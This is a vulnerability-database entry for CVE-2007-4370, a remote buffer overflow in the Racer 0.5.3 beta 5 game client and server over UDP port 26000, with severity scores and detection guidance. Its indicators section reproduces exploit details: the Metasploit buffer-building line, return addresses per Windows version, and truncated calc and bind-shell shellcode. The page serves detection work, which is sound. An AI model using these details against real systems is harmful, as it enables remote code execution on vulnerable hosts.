cbcvebase.
CVE-2007-4370
published 2007-08-15

CVE-2007-4370: Multiple buffer overflows in the (1) client and (2) server in Racer 0.5.3 beta 5 allow remote attackers to execute arbitrary code via a long string to UDP port…

PriorityP352high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
59.20%
99.0th percentile
Multiple buffer overflows in the (1) client and (2) server in Racer 0.5.3 beta 5 allow remote attackers to execute arbitrary code via a long string to UDP port 26000.

Affected

1 ranges
VendorProductVersion rangeFixed in
racerracer

Detection & IOCsextracted from sources · hover to see the quote

portUDP/26000
commandbuf = Rex::Text.rand_text_alphanumeric(1001); buf << [target.ret].pack('V'); buf << payload.encoded; buf << Rex::Text.rand_text_alphanumeric(1196 - payload.encoded.length); udp_sock.put(buf)
otherRet=0x10073FB7 (jmp esp, Fmodex.dll - Universal)
otherRet=0x77d8af0a (Win XP SP2 English)
otherRet=0x7c951eed (Win XP SP2 Spanish)
otherEIP=0x7C86467B (JMP ESP, Kernel32.dll, Win XP Pro SP3 English)
otherEIP=0x010013D9 (Win XP-Universal 1)
otherEIP=0x77E81674 (Windows 2000 SP0 English)
otherEIP=0x77E829EC (Windows XP SP1 English)
otherEIP=0x77E824B5 (Windows 2000 SP2 English)
otherEIP=0x77E8367A (Windows 2000 SP3 English)
otherEIP=0x77F92A9B (Windows 2000 SP4 English)
otherEIP=0x77E9AFE3 (Windows XP SP0 English)
otherEIP=0x77E626BA (Win XP-Universal 2)
port4444
bytes
Run Calc.exe shellcode (alphanumeric encoded, 339 bytes): \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49...
bytes
Bind shell on port 4444 shellcode (alphanumeric encoded, 238 bytes): \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49...
  • Detect oversized UDP datagrams (>1000 bytes) sent to port 26000, which is the trigger condition for the buffer overflow in both the Racer client and server.
  • The Metasploit module sends a 1001-byte alphanumeric random buffer followed by the return address and payload (total ~2197 bytes) over UDP/26000; alert on UDP/26000 datagrams exceeding 1000 bytes.
  • The exploit payload uses AlphanumUpper encoding with bad characters \x5c and \x00; look for large all-uppercase alphanumeric UDP payloads on port 26000.
  • The C exploit fills the packet buffer with repeated 'E' characters before appending the return address; a UDP/26000 payload consisting of a long run of 0x45 ('E') bytes is a strong indicator of exploitation.
  • Post-exploitation, the bind-shell payload opens TCP port 4444 on the victim; monitor for unexpected listening services on port 4444 following inbound UDP/26000 traffic.
  • The universal target uses a JMP ESP gadget in Fmodex.dll at 0x10073FB7; presence of this return address (bytes B7 3F 07 10) in a UDP/26000 payload indicates Metasploit exploitation.
  • ·The Metasploit module targets Windows only ('Platform' => 'win'); the NVD advisory notes both client and server are affected, so both processes on UDP/26000 are attack surfaces.
  • ·Payload space is limited to 1000 bytes with AlphanumUpper encoding required; larger or non-alphanumeric shellcode will not fit without adjustment.
  • ·The C exploit notes the vulnerability can be exploited using either a classic stack overflow (JMP ESP) or an SEH-based method, so detection should account for both exploitation techniques.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.